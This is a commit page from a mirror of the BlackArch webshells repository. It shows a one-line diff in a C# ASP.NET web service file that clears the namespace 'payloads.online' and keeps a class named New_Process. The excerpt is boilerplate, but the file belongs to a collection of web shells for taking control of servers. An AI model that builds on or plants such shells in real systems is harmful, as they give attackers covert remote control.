mirror of
https://github.com/BlackArch/webshells
synced 2024-11-12 23:27:09 +00:00
Update
This commit is contained in:
parent
be43efc9ac
commit
186312af8c
1 changed files with 2 additions and 2 deletions
|
@ -31,7 +31,7 @@ using System.Web.Services;
|
|||
using System.Xml;
|
||||
using System.Web.Services.Protocols;
|
||||
|
||||
[WebService(Namespace = "http://www.payloads.online/")]
|
||||
[WebService(Namespace = "")]
|
||||
[WebServiceBinding(ConformsTo = WsiProfiles.BasicProfile1_1)]
|
||||
|
||||
public class New_Process :Process
|
||||
|
|
Loading…
Reference in a new issue